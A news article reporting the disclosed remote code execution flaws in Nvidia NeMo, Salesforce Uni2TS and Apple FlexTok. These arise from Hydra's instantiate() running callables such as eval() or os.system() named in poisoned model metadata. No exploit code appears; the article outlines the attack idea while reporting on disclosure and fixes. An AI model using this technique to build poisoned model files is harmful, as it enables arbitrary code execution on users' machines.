Home Content News Hydra Dependency Creates Systemic AI Security Risk Across Hugging Face Models

Hydra Dependency Creates Systemic AI Security Risk Across Hugging Face Models

0
1
Open Source AI Supply Chain Exposed As Hydra Flaw Enables Poisoned Metadata Attacks Across Hugging Face Models
Open Source AI Supply Chain Exposed As Hydra Flaw Enables Poisoned Metadata Attacks Across Hugging Face Models

Critical flaws in widely used open source AI libraries from Nvidia, Salesforce, and Apple expose Hugging Face models to remote code execution via poisoned metadata, highlighting growing supply chain risks in shared AI tooling.

Critical security vulnerabilities have been uncovered in widely used open-source Python AI and machine learning libraries powering Hugging Face models, enabling remote code execution (RCE) through poisoned metadata embedded in model files.

The affected libraries include NeMo from Nvidia, Uni2TS from Salesforce, and FlexTok, developed by Apple in collaboration with EPFL’s Visual Intelligence and Learning Lab. All three rely on Hydra, an open-source configuration management library maintained by Meta. The flaw stems from Hydra’s hydra.utils.instantiate() function, which can execute any callable specified in configuration metadata, not just class constructors.

Attackers could exploit this behaviour by publishing modified models containing malicious metadata. When such models are loaded, the poisoned metadata can trigger functions such as eval() or os.system(), allowing arbitrary code execution.
The vulnerabilities were discovered by Palo Alto Networks’ Unit 42 threat research team and responsibly disclosed to maintainers. Fixes, advisories, and CVEs have since been issued, and no confirmed in-the-wild exploitation has been observed so far.

According to Unit 42 malware research engineer Curtis Carmony, “Attackers would just need to create a modification of an existing popular model, with either a real or claimed benefit, and then add malicious metadata.” He added that while formats such as safetensors may appear secure, “there is a very large attack surface in the code that consumes them.”

The issue highlights a broader open source AI supply chain risk. Hugging Face models collectively depend on more than 100 Python libraries, nearly half of which use Hydra, creating systemic exposure across the ecosystem. While Meta has updated Hydra’s documentation to warn about RCE risks, a recommended block-list mechanism has yet to be released, underscoring ongoing challenges in securing shared open-source AI infrastructure.

NO COMMENTS

LEAVE A REPLY

Please enter your comment!
Please enter your name here